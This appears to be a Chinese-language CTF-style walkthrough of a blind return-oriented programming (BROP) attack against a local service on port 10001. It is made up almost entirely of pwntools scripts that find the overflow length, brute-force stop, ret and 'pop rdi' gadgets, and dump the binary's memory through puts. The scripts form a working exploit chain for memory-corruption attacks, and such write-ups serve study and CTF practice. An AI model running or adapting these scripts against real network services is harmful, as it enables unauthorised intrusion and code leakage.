from pwn import*
def getsize():
i = 1
while 1:
try:
p = remote('127.0.0.1',10001)
p.recvuntil("WelCome my friend,Do you know password?\n")
p.send(i*'a')
data = p.recv()
p.close()
if not data.startswith('No password'):
return i-1
else:
i+=1
except EOFError:
p.close()
return i-1
size = getsize()
print "size is : %s "% size
可以得知栈溢出长度为72。
第二步(获取stop_gadget):
from pwn import *
def get_stop():
addr = 0x400000
while 1:
sleep(0.1)
addr += 1
try:
print hex(addr)
p = remote('127.0.0.1',10001)
p.recvuntil("WelCome my friend,Do you know password?\n")
payload = 'a'*72 + p64(addr)
p.sendline(payload)
data = p.recv()
p.close()
if data.startswith('WelCome'):
print "main funciton-->[%s]"%hex(addr)
pause()
return addr
else:
print 'one success addr : 0x%x'%(addr)
except EOFError as e:
p.close()
log.info("bad :0x%x"%addr)
except:
log.info("can't connect")
addr -= 1
data = get_stop()
print hex(data)
from pwn import *
stop_gadget = 0x401070
def ret_addr(addr):
io = remote("127.0.0.1",10001)
payload = 'A'*72 +p64(addr) + p64(stop_gadget)
io.recvuntil("WelCome my friend,Do you know password?")
io.sendline(payload)
try:
io.recvline()
if (io.recv()!=None):
print io.recv()
io.info("find gadgets at 0x%x" % addr)
print "[*] the ret addr at 0x%x" % (addr)
io.close()
except EOFError as e:
io.close()
log.info("the connection is close at 0x%x" %addr)
start = 0x400000
count = 0
while True:
start += 1
ret_addr(start)
count += 1
if count >0x1000:
break
有了ret(0x401000),我们就可以寻找 pop rdi;ret了:
from pwn import *
ret = 0x401000
stop_gadget = 0x401070
def get_useful_gadget(addr):
io = remote("127.0.0.1",10001)
payload1 = 'A'*72 +p64(addr-1) + p64(0)+p64(ret)+p64(stop_gadget)
payload2 = 'A'*72 +p64(addr) + p64(0)+p64(ret)+p64(stop_gadget)
payload3 = 'A'*72 +p64(addr+1) +p64(ret)+p64(stop_gadget)
io.recvuntil("WelCome my friend,Do you know password?")
try:
io.sendline(payload1)
if io.recvuntil("WelCome my friend,Do you know password?"):
io.sendline(payload2)
if io.recvuntil("WelCome my friend,Do you know password?"):
io.sendline(payload3)
if io.recvuntil("WelCome my friend,Do you know password?"):
io.info("find gdgets at 0x%x" % addr)
log_in_file(addr)
io.close()
except EOFError as e:
io.close()
log.info("the connection is close at 0x%x" %addr)
start = 0x400000
while True:
start += 1
get_useful_gadget(start)
from pwn import*
def leak(length,rdi_ret,puts_plt,leak_addr,stop_gadget):
p = remote('127.0.0.1',10001)
payload = 'a'*length + p64(rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadget)
p.recvuntil('password?\n')
p.sendline(payload)
try:
data = p.recv(timeout = 0.1)
p.close()
try:
data = data[:data.index("\nWelCome")]
except Exception:
data = data
if data =="":
data = '\x00'
return data
except Exception:
p.close()
return None
length = 72
stop_gadget = 0x401070
brop_gadget = 0x401076
rdi_ret = 0x401076
puts_plt = 0x400560
addr = 0x400000
result = ''
while addr < 0x401000:
print hex(addr)
data = leak(length,rdi_ret,puts_plt,addr,stop_gadget)
if data is None:
addr += 1
continue
else:
result += data
addr += len(data)
with open('code1','wb') as f:
f.write(result)